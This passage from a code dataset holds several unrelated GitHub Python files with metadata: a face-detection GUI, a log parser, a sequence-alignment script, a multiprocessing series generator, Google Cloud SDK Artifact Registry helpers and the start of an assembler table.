scale)\r\n\r\n dimensions = (width, height)\r\n\r\n return cv.resize(frame, dimensions, interpolation=cv.INTER_AREA)\r\n\r\n while True:\r\n isTrue, frame = capture.read()\r\n\r\n frame_resized = rescaleFrame(frame, scale=0.25)\r\n \r\n ClassIndex, confidece, bbox = model.detect(frame_resized, confThreshold=0.55)\r\n\r\n if (len(ClassIndex) != 0):\r\n for ClassInd, conf, boxes, in zip(ClassIndex.flatten(), confidece.flatten(), bbox):\r\n if(ClassInd <= 80):\r\n cv.rectangle(frame_resized, boxes, (255, 0, 0), 2)\r\n cv.putText(frame_resized, classLabels[ClassInd-1], (boxes[0] + 10,\r\n boxes[1] + 30), cv.FONT_HERSHEY_PLAIN, 3, (0, 255, 0))\r\n\r\n cv.imshow('Object Detection', frame_resized)\r\n\r\n if cv.waitKey(1) & 0xFF == ord('d'):\r\n break\r\n\r\n capture.release()\r\n cv.destroyAllWindows()\r\n\r\n\r\ndef open_Excel_Sheet():\r\n os.startfile('Attendance_Sheet.csv')\r\n\r\n\r\ndef upload1():\r\n import time\r\n statusvar1.set(\"Loading.\")\r\n sbar1.update()\r\n time.sleep(0.5)\r\n statusvar1.set(\"Loading..\")\r\n sbar1.update()\r\n time.sleep(0.5)\r\n statusvar1.set(\"Loading...\")\r\n sbar1.update()\r\n time.sleep(0.5)\r\n statusvar1.set(\"Hold On!\")\r\n sbar1.update()\r\n statusvar1.set(\"\")\r\n\r\n\r\ndef upload2():\r\n import time\r\n statusvar2.set(\"Loading.\")\r\n sbar2.update()\r\n time.sleep(0.5)\r\n statusvar2.set(\"Loading..\")\r\n sbar2.update()\r\n time.sleep(0.5)\r\n statusvar2.set(\"Loading...\")\r\n sbar2.update()\r\n time.sleep(0.5)\r\n statusvar2.set(\"Hold On!\")\r\n sbar2.update()\r\n statusvar2.set(\"\")\r\n\r\n\r\ndef upload3():\r\n import time\r\n statusvar3.set(\"Loading.\")\r\n sbar3.update()\r\n time.sleep(0.5)\r\n statusvar3.set(\"Loading..\")\r\n sbar3.update()\r\n time.sleep(0.5)\r\n statusvar3.set(\"Loading...\")\r\n sbar3.update()\r\n time.sleep(0.5)\r\n statusvar3.set(\"Hold On!\")\r\n sbar3.update()\r\n statusvar3.set(\"\")\r\n\r\n\r\ndef upload4():\r\n import time\r\n statusvar4.set(\"Loading.\")\r\n sbar4.update()\r\n time.sleep(0.5)\r\n statusvar4.set(\"Loading..\")\r\n sbar4.update()\r\n time.sleep(0.5)\r\n statusvar4.set(\"Loading...\")\r\n sbar4.update()\r\n time.sleep(0.5)\r\n statusvar4.set(\"Hold On!\")\r\n sbar4.update()\r\n statusvar4.set(\"\")\r\n\r\n\r\nroot = Tk()\r\nroot.geometry(\"1000x600\")\r\nroot.maxsize(1000, 600)\r\nroot.minsize(1000, 600)\r\nroot.title(\"Face Recognition And Detecting Features\")\r\nroot.configure(bg=\"#8646f1\")\r\n\r\nheading1 = Label(root, text=\"FACE RECOGNITION & DETECTION FEATURES\",\r\n bg=\"#8646f1\", fg=\"#ededed\", font=\"tahoma 30 bold\")\r\nheading1.pack(side=TOP, pady=(40, 5))\r\nheading2 = Label(root, text=\"Made By: Akriti & Anurag\",\r\n bg=\"#8646f1\", fg=\"#ededed\", font=\"tahoma 20 bold\")\r\nheading2.pack(side=TOP, pady=(5, 0))\r\n\r\nframe1 = Frame(root, bg=\"#ededed\", padx=5, pady=5)\r\nname1 = Label(frame1, fg=\"#722ce1\", bg=\"#ededed\",\r\n text=\"FACE DETECTION\", font=\"lucida 12 bold\")\r\nname1.pack(pady=(15, 10))\r\ntext1 = Label(frame1, width=25, height=8, fg=\"black\", bg=\"#ededed\",\r\n text=\"This will help you to detect\\nfaces in live video supported\\nby webcam.\", font=\"verdana 10\")\r\ntext1.pack(pady=10)\r\nstatusvar1 = StringVar()\r\nstatusvar1.set(\"\")\r\nsbar1 = Label(frame1, textvariable=statusvar1, bg=\"#ededed\",\r\n fg=\"#722ce1\", font=\"tahoma 10 bold\", pady=5)\r\nsbar1.pack(side=BOTTOM, fill=X)\r\nbutton1 = Button(frame1, width=16, bg=\"#8846f1\", fg=\"#ededed\", text=\"Click to Enter\",\r\n font=\"lucida 15 bold\", relief=GROOVE, command=face_Detection)\r\nbutton1.pack(side=BOTTOM)\r\nframe1.pack(side=LEFT, padx=20)\r\n\r\nframe2 = Frame(root, bg=\"#ededed\", padx=5, pady=5)\r\nname2 = Label(frame2, fg=\"#722ce1\", bg=\"#ededed\",\r\n text=\"FACE RECOGNITION\", font=\"lucida 12 bold\")\r\nname2.pack(pady=(15, 10))\r\ntext2 = Label(frame2, width=25, height=8, fg=\"black\", bg=\"#ededed\",\r\n text=\"This will help you to recognise\\nfaces in live video supported\\nby webcam.\", font=\"verdana 10\")\r\ntext2.pack(pady=10)\r\nstatusvar2 = StringVar()\r\nstatusvar2.set(\"\")\r\nsbar2 = Label(frame2, textvariable=statusvar2, bg=\"#ededed\",\r\n fg=\"#722ce1\", font=\"tahoma 10 bold\", pady=5)\r\nsbar2.pack(side=BOTTOM, fill=X)\r\nbutton2 = Button(frame2, width=16, bg=\"#8846f1\", fg=\"white\", text=\"Click to Enter\",\r\n font=\"lucida 15 bold\", relief=GROOVE, command=face_Recognition)\r\nbutton2.pack(side=BOTTOM)\r\nframe2.pack(side=LEFT, padx=20)\r\n\r\nframe3 = Frame(root, bg=\"#ededed\", padx=5, pady=5)\r\nname3 = Label(frame3, fg=\"#722ce1\", bg=\"#ededed\",\r\n text=\"ATTENDANCE SYSTEM\", font=\"lucida 12 bold\")\r\nname3.pack(pady=(15, 10))\r\ntext3 = Label(frame3, width=22, height=5, fg=\"black\", bg=\"#ededed\",\r\n text=\"This will help you recognise\\nface of a person and mark\\nattendance of that person\\n in an excel sheet.\", font=\"verdana 10\")\r\ntext3.pack(pady=10)\r\nstatusvar3 = StringVar()\r\nstatusvar3.set(\"\")\r\nsbar3 = Label(frame3, textvariable=statusvar3, bg=\"#ededed\",\r\n fg=\"#722ce1\", font=\"tahoma 10 bold\", pady=5)\r\nsbar3.pack(side=BOTTOM, fill=X)\r\nbutton3 = Button(frame3, width=16, bg=\"#8846f1\", fg=\"white\", text=\"Click to Enter\",\r\n font=\"lucida 15 bold\", relief=GROOVE, command=mark_Attendance)\r\nbutton3.pack(side=BOTTOM)\r\nbutton_extra = Button(frame3, width=16, bg=\"#8846f1\", fg=\"white\", text=\"Open Excel Sheet\",\r\n font=\"lucida 15 bold\", relief=GROOVE, command=open_Excel_Sheet)\r\nbutton_extra.pack(side=BOTTOM, pady=5)\r\nframe3.pack(side=LEFT, padx=20)\r\n\r\nframe4 = Frame(root, bg=\"#ededed\", padx=5, pady=5)\r\nname3 = Label(frame4, fg=\"#722ce1\", bg=\"#ededed\",\r\n text=\"OBJECT DETECTION\", font=\"lucida 12 bold\")\r\nname3.pack(pady=(15, 10))\r\ntext4 = Label(frame4, width=22, height=8, fg=\"black\", bg=\"#ededed\",\r\n text=\"This will detect objects\\nfrom a video.\", font=\"verdana 10\")\r\ntext4.pack(pady=10)\r\nstatusvar4 = StringVar()\r\nstatusvar4.set(\"\")\r\nsbar4 = Label(frame4, textvariable=statusvar4, bg=\"#ededed\",\r\n fg=\"#722ce1\", font=\"tahoma 10 bold\", pady=5)\r\nsbar4.pack(side=BOTTOM, fill=X)\r\nbutton4 = Button(frame4, width=16, bg=\"#8846f1\", fg=\"white\", text=\"Click to Enter\",\r\n font=\"lucida 15 bold\", relief=GROOVE, command=object_Detection)\r\nbutton4.pack(side=BOTTOM)\r\nframe4.pack(side=LEFT, padx=20)\r\n\r\nroot.mainloop()\r\n","repo_name":"akritibhan/Face-Detection-and-Recognition-final","sub_path":"FINAL.py","file_name":"FINAL.py","file_ext":"py","file_size_in_byte":12317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"5983920279","text":"#!/usr/bin/python3\n\"\"\"Log parsing Task\"\"\"\nimport sys\nimport re\n\n\nif __name__ == \"__main__\":\n value_dict = {}\n file_size = 0\n count = 0\n\n def check_pattern(pattern):\n \"\"\"Check that pattern matches\"\"\"\n status_list = [200, 301, 400, 401, 403, 404, 405, 500]\n split_list = pattern.split(\" \")\n\n # Check if size and codes fit values\n try:\n size = split_list[-1]\n code = split_list[-2]\n if (int(code) not in status_list):\n code = 0\n except (ValueError, IndexError):\n code = 0\n\n # Check for integer value of size\n try:\n size = int(size)\n except ValueError:\n return False\n\n return [code, int(size)]\n\n def print_result():\n \"\"\"Print results\"\"\"\n print('File size: {}'.format(file_size))\n sort_data = dict(sorted(value_dict.items()))\n for key, value in sort_data.items():\n print('{}: {}'.format(key, value))\n\n try:\n for line in sys.stdin:\n result = check_pattern(line)\n if (result is not False and result[0] == 0):\n file_size += result[1]\n elif (result is not False and result[0] != 0):\n count = count + 1\n value_dict[result[0]] = value_dict.get(result[0], 0) + 1\n file_size += result[1]\n if (count == 10):\n count = 0\n print_result()\n else:\n pass\n print_result()\n except (KeyboardInterrupt, EOFError):\n print_result()\n","repo_name":"adeyemodanointed/alx-interview","sub_path":"0x03-log_parsing/0-stats.py","file_name":"0-stats.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40198202379","text":"from typing import Tuple, List\n\nfrom Bio import SeqIO, Seq\nfrom Bio.pairwise2 import align, format_alignment\nfrom Bio.SubsMat import MatrixInfo\n\n# sequence of nucleotides (over alphabet Σ = {A, C, G, T}).\nSequenceN = str\n\n# sequence of amino acids.\nSequenceAA = str\n\n# local alignment, as returned by Bio.pairwise2.alignXX function\nLocalAlignment = Tuple[str, str, float, int, int]\n\n\nclass SequenceTranslation:\n \"\"\"\n Sequence represented as both nucleotides and amino acids.\n \"\"\"\n\n def __init__(self, seq_n: SequenceN, seq_aa: SequenceAA = None):\n self.seq_n = seq_n\n self.seq_aa = Seq.translate(seq_n) if seq_aa is None else seq_aa\n\n def split(self) -> List['SequenceTranslation']:\n \"\"\"\n List of sequences split by \"*\" char in amino acidic representation.\n In special case of original sequence not having \"*\" char, returns a singleton of itself.\n \"\"\"\n seq_aa = self.seq_aa\n seq_n = self.seq_n\n ret = []\n pos = None\n\n while pos != -1:\n pos = seq_aa.find(\"*\")\n\n if pos == -1:\n if len(seq_aa) > 0:\n new_seq = SequenceTranslation(seq_n, seq_aa)\n ret.append(new_seq)\n else:\n new_seq_aa = seq_aa[:pos]\n new_seq_n = seq_n[:3 * pos]\n if len(new_seq_aa) > 0:\n new_seq = SequenceTranslation(new_seq_n, new_seq_aa)\n ret.append(new_seq)\n seq_aa = seq_aa[pos + 1:]\n seq_n = seq_n[3 * (pos + 1):]\n\n return ret\n\n\ndef possible_translations(seq: SequenceN) -> List[SequenceTranslation]:\n \"\"\"\n :return: list of all (3) possible translations, by discarding first 0, 1, or 2 nucleotides.\n \"\"\"\n\n def truncate_tail(s: SequenceN) -> SequenceN:\n \"\"\" Helper function returning truncated sequence so that len(seq) mod 3 == 0. \"\"\"\n return s if len(s) % 3 == 0 else s[:-(len(s) % 3)]\n\n return [SequenceTranslation(truncate_tail(seq[i:])) for i in range(3)]\n\n\nclass LocalAlignmentWrapper:\n \"\"\"\n Wrapper class for alignment: computing, comparing, and converting to nucleotides.\n \"\"\"\n\n def __init__(self, seq1: SequenceTranslation, seq2: SequenceTranslation,\n match_dict: dict, open_gap_penalty: float, extend_gap_penalty: float):\n self.seq1 = seq1\n self.seq2 = seq2\n\n alignments = align.localds(seq1.seq_aa, seq2.seq_aa, match_dict, open_gap_penalty, extend_gap_penalty,\n one_alignment_only=True)\n\n if len(alignments) == 0:\n self.value = float('-inf')\n else:\n _, _, self.value, _, _ = alignments[0]\n self.alignment_aa = alignments[0]\n\n def __lt__(self, other):\n if not isinstance(other, LocalAlignmentWrapper):\n return False\n else:\n return self.value < other.value\n\n def alignment_n(self) -> LocalAlignment:\n \"\"\"\n Returns the alignment but with amino acids converted back to nucleotides.\n \"\"\"\n\n def aligned_aa_to_n(seq_n: SequenceN, seq_aa_aligned: SequenceAA) -> SequenceN:\n \"\"\" Helper function returning seq_n but extended with gaps in places where seq_aa_aligned has gaps. \"\"\"\n tmp = []\n non_gap = 0\n for i, c in enumerate(seq_aa_aligned):\n if c == '-':\n tmp.append('---')\n else:\n tmp.append(seq_n[3 * non_gap:3 * non_gap + 3])\n non_gap += 1\n\n return \"\".join(tmp)\n\n seq1_aligned_aa, seq2_aligned_aa, value, lower_bound, upper_bound = self.alignment_aa\n\n return (aligned_aa_to_n(self.seq1.seq_n, seq1_aligned_aa), aligned_aa_to_n(self.seq2.seq_n, seq2_aligned_aa),\n value, 3 * lower_bound, 3 * upper_bound)\n\n\ndef best_local_alignment(seq1_n: SequenceN, seq2_n: SequenceN,\n open_gap_penalty: float, extend_gap_penalty: float) -> LocalAlignment:\n \"\"\"\n Finds best local alignment as required in task specification.\n \"\"\"\n\n # translate sequences into amino acids (in all 3 possible ways) and split them by stop codon\n seq1_all_fragments = [subseq_t for seq_t in possible_translations(seq1_n) for subseq_t in seq_t.split()]\n seq2_all_fragments = [subseq_t for seq_t in possible_translations(seq2_n) for subseq_t in seq_t.split()]\n\n alignments = []\n for s1 in seq1_all_fragments:\n for s2 in seq2_all_fragments:\n alignment = LocalAlignmentWrapper(s1, s2,\n match_dict=MatrixInfo.blosum60,\n open_gap_penalty=open_gap_penalty,\n extend_gap_penalty=extend_gap_penalty)\n alignments.append(alignment)\n\n best_alignment = max(alignments)\n return best_alignment.alignment_n()\n\n\ndef histones():\n seqs_histones = list([s.seq._data for s in SeqIO.parse(\"histones.fa\", \"fasta\")])\n\n for i, s1 in enumerate(seqs_histones):\n for j, s2 in enumerate(seqs_histones):\n if i < j:\n alignment = best_local_alignment(s1, s2, open_gap_penalty=-1, extend_gap_penalty=-0.5)\n print(format_alignment(*alignment))\n\n\nif __name__ == '__main__':\n histones()\n","repo_name":"rotifyld/2019l-computational-biology-intro","sub_path":"labs/03/h02.py","file_name":"h02.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"39892338769","text":"# Importar las bibliotecas necesarias\r\nimport multiprocessing\r\n\r\n# NOMBRE: VICTOR GABRIEL CAPIA ALI\r\n# CI: 4762494 LP\r\n# PREGUNTA 4\r\n# Con multiprocesing genera la siguiente serie 2, 2, 5, 4, 10, 6, 17,… (10000 posiciones sin restricción de procesador).\r\n\r\ndef calcular_valor(posicion):\r\n if posicion % 2 == 1:\r\n # Números impares\r\n return (posicion // 2 + 1) * (posicion // 2 + 1) + 1\r\n else:\r\n # Números pares\r\n return (posicion // 2) * 2\r\n\r\nif __name__ == '__main__':\r\n num_posiciones = 10000\r\n \r\n # Creamos un grupo de procesos\r\n pool = multiprocessing.Pool()\r\n\r\n # Generamos la serie en paralelo\r\n serie = pool.map(calcular_valor, range(1, num_posiciones + 1))\r\n\r\n # Cerramos el grupo de procesos\r\n pool.close()\r\n pool.join()\r\n\r\n print(serie)","repo_name":"Deimos7001/p4","sub_path":"P# 4/pregunta04.py","file_name":"pregunta04.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"27765312959","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nfrom apitools.base.py import list_pager\nfrom googlecloudsdk.api_lib.artifacts import exceptions as ar_exceptions\nfrom googlecloudsdk.api_lib.cloudkms import iam as kms_iam\nfrom googlecloudsdk.api_lib.cloudresourcemanager import projects_api\nfrom googlecloudsdk.api_lib.iam import util as iam_api\nfrom googlecloudsdk.api_lib.util import apis\nfrom googlecloudsdk.command_lib.iam import iam_util\nfrom googlecloudsdk.command_lib.projects import util as project_util\nfrom googlecloudsdk.core import resources\n\nARTIFACTREGISTRY_API_NAME = \"artifactregistry\"\nARTIFACTREGISTRY_API_VERSION = \"v1\"\n\nSTORAGE_API_NAME = \"storage\"\nSTORAGE_API_VERSION = \"v1\"\n\n_GCR_PERMISSION = \"storage.objects.list\"\n\nCRYPTO_KEY_COLLECTION = \"cloudkms.projects.locations.keyRings.cryptoKeys\"\n\nREDIRECT_PERMISSIONS = [\"storage.buckets.update\"]\n\n\ndef GetStorageClient():\n return apis.GetClientInstance(STORAGE_API_NAME, STORAGE_API_VERSION)\n\n\ndef GetStorageMessages():\n return apis.GetMessagesModule(STORAGE_API_NAME, STORAGE_API_VERSION)\n\n\ndef GetClient(skip_activation_prompt=False):\n return apis.GetClientInstance(\n ARTIFACTREGISTRY_API_NAME,\n ARTIFACTREGISTRY_API_VERSION,\n skip_activation_prompt=skip_activation_prompt,\n )\n\n\ndef GetMessages():\n return apis.GetMessagesModule(ARTIFACTREGISTRY_API_NAME,\n ARTIFACTREGISTRY_API_VERSION)\n\n\ndef GetClientV1beta2():\n return apis.GetClientInstance(ARTIFACTREGISTRY_API_NAME,\n \"v1beta2\")\n\n\ndef GetMessagesV1beta2():\n return apis.GetMessagesModule(ARTIFACTREGISTRY_API_NAME,\n \"v1beta2\")\n\n\ndef DeleteTag(client, messages, tag):\n \"\"\"Deletes a tag by its name.\"\"\"\n delete_tag_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesTagsDeleteRequest(\n name=tag)\n err = client.projects_locations_repositories_packages_tags.Delete(\n delete_tag_req)\n if not isinstance(err, messages.Empty):\n raise ar_exceptions.ArtifactRegistryError(\n \"Failed to delete tag {}: {}\".format(tag, err))\n\n\ndef CreateDockerTag(client, messages, docker_tag, docker_version):\n \"\"\"Creates a tag associated with the given docker version.\"\"\"\n tag = messages.Tag(\n name=docker_tag.GetTagName(), version=docker_version.GetVersionName())\n create_tag_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesTagsCreateRequest(\n parent=docker_tag.GetPackageName(), tag=tag, tagId=docker_tag.tag)\n return client.projects_locations_repositories_packages_tags.Create(\n create_tag_req)\n\n\ndef GetTag(client, messages, tag):\n \"\"\"Gets a tag by its name.\"\"\"\n get_tag_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesTagsGetRequest(\n name=tag)\n return client.projects_locations_repositories_packages_tags.Get(get_tag_req)\n\n\ndef DeleteVersion(client, messages, version):\n \"\"\"Deletes a version by its name.\"\"\"\n delete_ver_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesVersionsDeleteRequest(\n name=version)\n return client.projects_locations_repositories_packages_versions.Delete(\n delete_ver_req)\n\n\ndef DeletePackage(client, messages, package):\n \"\"\"Deletes a package by its name.\"\"\"\n delete_pkg_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesDeleteRequest(\n name=package)\n return client.projects_locations_repositories_packages.Delete(delete_pkg_req)\n\n\ndef GetVersion(client, messages, version):\n \"\"\"Gets a version by its name.\"\"\"\n client = GetClient()\n messages = GetMessages()\n get_ver_req = (\n messages\n .ArtifactregistryProjectsLocationsRepositoriesPackagesTagsGetRequest(\n name=version))\n return client.projects_locations_repositories_packages_tags.Get(get_ver_req)\n\n\ndef GetVersionFromTag(client, messages, tag):\n \"\"\"Gets a version name by a tag name.\"\"\"\n get_tag_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesTagsGetRequest(\n name=tag)\n get_tag_res = client.projects_locations_repositories_packages_tags.Get(\n get_tag_req)\n if not get_tag_res.version or len(get_tag_res.version.split(\"/\")) != 10:\n raise ar_exceptions.ArtifactRegistryError(\n \"Internal error. Corrupted tag: {}\".format(tag))\n return get_tag_res.version.split(\"/\")[-1]\n\n\ndef ListTags(client, messages, package, page_size=None):\n \"\"\"Lists all tags under a package with the given package name.\"\"\"\n list_tags_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesTagsListRequest(\n parent=package)\n return list(\n list_pager.YieldFromList(\n client.projects_locations_repositories_packages_tags,\n list_tags_req,\n batch_size=page_size,\n batch_size_attribute=\"pageSize\",\n field=\"tags\"))\n\n\ndef ListVersionTags(client, messages, package, version, page_size=None):\n \"\"\"Lists tags associated with the given version.\"\"\"\n list_tags_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesTagsListRequest(\n parent=package, filter=\"version=\\\"{}\\\"\".format(version))\n return list(\n list_pager.YieldFromList(\n client.projects_locations_repositories_packages_tags,\n list_tags_req,\n batch_size=page_size,\n batch_size_attribute=\"pageSize\",\n field=\"tags\"))\n\n\ndef ListPackages(client, messages, repo, page_size=None):\n \"\"\"Lists all packages under a repository.\"\"\"\n list_pkgs_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesListRequest(\n parent=repo)\n return list(\n list_pager.YieldFromList(\n client.projects_locations_repositories_packages,\n list_pkgs_req,\n batch_size=page_size,\n batch_size_attribute=\"pageSize\",\n field=\"packages\"))\n\n\ndef ListVersions(client, messages, pkg, version_view,\n page_size=None, order_by=None, limit=None):\n \"\"\"Lists all versions under a package.\"\"\"\n page_limit = limit\n if limit is None or (page_size is not None and page_size < limit):\n page_limit = page_size\n\n list_vers_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesVersionsListRequest(\n parent=pkg, view=version_view, orderBy=order_by)\n return list(\n list_pager.YieldFromList(\n client.projects_locations_repositories_packages_versions,\n list_vers_req,\n limit=limit,\n batch_size=page_limit,\n batch_size_attribute=\"pageSize\",\n field=\"versions\"))\n\n\ndef ListRepositories(project, page_size=None):\n \"\"\"Lists all repositories under a project.\"\"\"\n client = GetClient()\n messages = GetMessages()\n list_repos_req = messages.ArtifactregistryProjectsLocationsRepositoriesListRequest(\n parent=project)\n return list(\n list_pager.YieldFromList(\n client.projects_locations_repositories,\n list_repos_req,\n batch_size=page_size,\n batch_size_attribute=\"pageSize\",\n field=\"repositories\"))\n\n\ndef ListFiles(client, messages, repo, arg_filters, page_size=None):\n \"\"\"Lists all files under a repository.\"\"\"\n client = GetClient()\n messages = GetMessages()\n list_files_req = (\n messages.ArtifactregistryProjectsLocationsRepositoriesFilesListRequest(\n parent=repo, filter=arg_filters))\n return list(\n list_pager.YieldFromList(\n client.projects_locations_repositories_files,\n list_files_req,\n batch_size=page_size,\n batch_size_attribute=\"pageSize\",\n field=\"files\"))\n\n\ndef GetRepository(repo, skip_activation_prompt=False):\n \"\"\"Gets the repository given its name.\"\"\"\n client = GetClient(skip_activation_prompt)\n messages = GetMessages()\n get_repo_req = messages.ArtifactregistryProjectsLocationsRepositoriesGetRequest(\n name=repo)\n get_repo_res = client.projects_locations_repositories.Get(get_repo_req)\n return get_repo_res\n\n\ndef GetIamPolicy(repo_res):\n \"\"\"Gets the IAM policy for the specified repository.\"\"\"\n client = GetClient()\n messages = GetMessages()\n get_iam_policy_req = messages.ArtifactregistryProjectsLocationsRepositoriesGetIamPolicyRequest(\n resource=repo_res)\n get_iam_policy_res = client.projects_locations_repositories.GetIamPolicy(\n get_iam_policy_req)\n return get_iam_policy_res\n\n\ndef CreateRepository(\n project, location, repository, skip_activation_prompt=False\n):\n \"\"\"Creates the repository given its parent.\n\n Args:\n project: str: The project to create the repository in.\n location: str: The region to create the repository in.\n repository: messages.Repository to create.\n skip_activation_prompt: bool: If true, do not prompt for service activation\n\n Returns:\n The resulting operation from the create request.\n \"\"\"\n client = GetClient(skip_activation_prompt)\n messages = GetMessages()\n request = messages.ArtifactregistryProjectsLocationsRepositoriesCreateRequest(\n parent=\"projects/{}/locations/{}\".format(project, location),\n repositoryId=repository.name.split(\"/\")[-1],\n repository=repository)\n return client.projects_locations_repositories.Create(request)\n\n\ndef GetPackage(package):\n \"\"\"Gets the package given its name.\"\"\"\n client = GetClient()\n messages = GetMessages()\n get_package_req = messages.ArtifactregistryProjectsLocationsRepositoriesPackagesGetRequest(\n name=package)\n get_package_res = client.projects_locations_repositories_packages.Get(\n get_package_req)\n return get_package_res\n\n\ndef ListLocations(project_id, page_size=None):\n \"\"\"Lists all locations for a given project.\"\"\"\n client = GetClientV1beta2()\n messages = GetMessagesV1beta2()\n list_locs_req = messages.ArtifactregistryProjectsLocationsListRequest(\n name=\"projects/\" + project_id)\n locations = list_pager.YieldFromList(\n client.projects_locations,\n list_locs_req,\n batch_size=page_size,\n batch_size_attribute=\"pageSize\",\n field=\"locations\")\n return sorted([loc.locationId for loc in locations])\n\n\ndef TestStorageIAMPermission(bucket, project):\n \"\"\"Tests storage IAM permission for a given bucket for the user project.\"\"\"\n client = GetStorageClient()\n messages = GetStorageMessages()\n test_req = messages.StorageBucketsTestIamPermissionsRequest(\n bucket=bucket, permissions=_GCR_PERMISSION, userProject=project)\n return client.buckets.TestIamPermissions(test_req)\n\n\ndef GetCryptoKeyPolicy(kms_key):\n \"\"\"Gets the IAM policy for a given crypto key.\"\"\"\n crypto_key_ref = resources.REGISTRY.ParseRelativeName(\n relative_name=kms_key, collection=CRYPTO_KEY_COLLECTION)\n return kms_iam.GetCryptoKeyIamPolicy(crypto_key_ref)\n\n\ndef AddCryptoKeyPermission(kms_key, service_account):\n \"\"\"Adds Encrypter/Decrypter role to the given service account.\"\"\"\n crypto_key_ref = resources.REGISTRY.ParseRelativeName(\n relative_name=kms_key, collection=CRYPTO_KEY_COLLECTION)\n return kms_iam.AddPolicyBindingToCryptoKey(\n crypto_key_ref, service_account,\n \"roles/cloudkms.cryptoKeyEncrypterDecrypter\")\n\n\ndef GetServiceAccount(service_account):\n \"\"\"Gets the service account given its email.\"\"\"\n client, messages = iam_api.GetClientAndMessages()\n return client.projects_serviceAccounts.Get(\n messages.IamProjectsServiceAccountsGetRequest(\n name=iam_util.EmailToAccountResourceName(service_account)))\n\n\ndef TestRedirectionIAMPermission(project):\n \"\"\"Tests the user has the storage.buckets.update IAM permission on the project.\"\"\"\n project_ref = project_util.ParseProject(project)\n result = projects_api.TestIamPermissions(project_ref, REDIRECT_PERMISSIONS)\n return set(REDIRECT_PERMISSIONS) == set(result.permissions)\n\n\ndef GetProjectSettings(project_id):\n client = GetClient()\n messages = GetMessages()\n get_settings_req = messages.ArtifactregistryProjectsGetProjectSettingsRequest(\n name=\"projects/\" + project_id + \"/projectSettings\")\n return client.projects.GetProjectSettings(get_settings_req)\n\n\ndef GetVPCSCConfig(project_id, location_id):\n \"\"\"Gets VPC SC Config on the project and location.\"\"\"\n client = GetClient()\n messages = GetMessages()\n get_vpcsc_req = messages.ArtifactregistryProjectsLocationsGetVpcscConfigRequest(\n name=\"projects/\" + project_id + \"/locations/\" + location_id +\n \"/vpcscConfig\")\n return client.projects_locations.GetVpcscConfig(get_vpcsc_req)\n\n\ndef AllowVPCSCConfig(project_id, location_id):\n \"\"\"Allows requests in Remote Repository inside VPC SC perimeter.\"\"\"\n client = GetClient()\n messages = GetMessages()\n vc = messages.VPCSCConfig(\n name=\"projects/\" + project_id + \"/locations/\" + location_id +\n \"/vpcscConfig\",\n vpcscPolicy=messages.VPCSCConfig.VpcscPolicyValueValuesEnum.ALLOW)\n update_vpcsc_req = messages.ArtifactregistryProjectsLocationsUpdateVpcscConfigRequest(\n name=\"projects/\" + project_id + \"/locations/\" + location_id +\n \"/vpcscConfig\",\n vPCSCConfig=vc)\n return client.projects_locations.UpdateVpcscConfig(update_vpcsc_req)\n\n\ndef DenyVPCSCConfig(project_id, location_id):\n \"\"\"Denies requests in Remote Repository inside VPC SC perimeter.\"\"\"\n client = GetClient()\n messages = GetMessages()\n vc = messages.VPCSCConfig(\n name=\"projects/\" + project_id + \"/locations/\" + location_id +\n \"/vpcscConfig\",\n vpcscPolicy=messages.VPCSCConfig.VpcscPolicyValueValuesEnum.DENY)\n get_vpcsc_req = messages.ArtifactregistryProjectsLocationsUpdateVpcscConfigRequest(\n name=\"projects/\" + project_id + \"/locations/\" + location_id +\n \"/vpcscConfig\",\n vPCSCConfig=vc)\n return client.projects_locations.UpdateVpcscConfig(get_vpcsc_req)\n\n\ndef EnableUpgradeRedirection(project_id):\n messages = GetMessages()\n return SetUpgradeRedirectionState(\n project_id, messages.ProjectSettings.LegacyRedirectionStateValueValuesEnum\n .REDIRECTION_FROM_GCR_IO_ENABLED)\n\n\ndef DisableUpgradeRedirection(project_id):\n messages = GetMessages()\n return SetUpgradeRedirectionState(\n project_id, messages.ProjectSettings.LegacyRedirectionStateValueValuesEnum\n .REDIRECTION_FROM_GCR_IO_DISABLED)\n\n\ndef FinalizeUpgradeRedirection(project_id):\n messages = GetMessages()\n return SetUpgradeRedirectionState(\n project_id, messages.ProjectSettings.LegacyRedirectionStateValueValuesEnum\n .REDIRECTION_FROM_GCR_IO_FINALIZED)\n\n\ndef SetUpgradeRedirectionState(project_id, redirection_state):\n \"\"\"Sets the upgrade redirection state for the supplied project.\"\"\"\n client = GetClient()\n messages = GetMessages()\n project_settings = messages.ProjectSettings(\n legacyRedirectionState=redirection_state)\n update_mask = \"legacy_redirection_state\"\n update_settings_req = messages.ArtifactregistryProjectsUpdateProjectSettingsRequest(\n name=\"projects/\" + project_id + \"/projectSettings\",\n projectSettings=project_settings,\n updateMask=update_mask)\n return client.projects.UpdateProjectSettings(update_settings_req)\n","repo_name":"twistedpair/google-cloud-sdk","sub_path":"google-cloud-sdk/lib/googlecloudsdk/command_lib/artifacts/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":14890,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"7"} +{"seq_id":"22498696400","text":"import argparse\nimport ast\nfrom functools import partial\n\n# TODO:\n# - MAKE > and < work\n\nmnemonics = {\n\t\"NOP\": {\n\t\t\"\": 0x01\n\t},\n\t\"STR\": {\n\t\t\"R0 ADR\": 0x09,\n\t\t\"R1 ADR\": 0x0a,\n\t\t\"R2 ADR\": 0x0b,\n\t\t\"R3 ADR\": 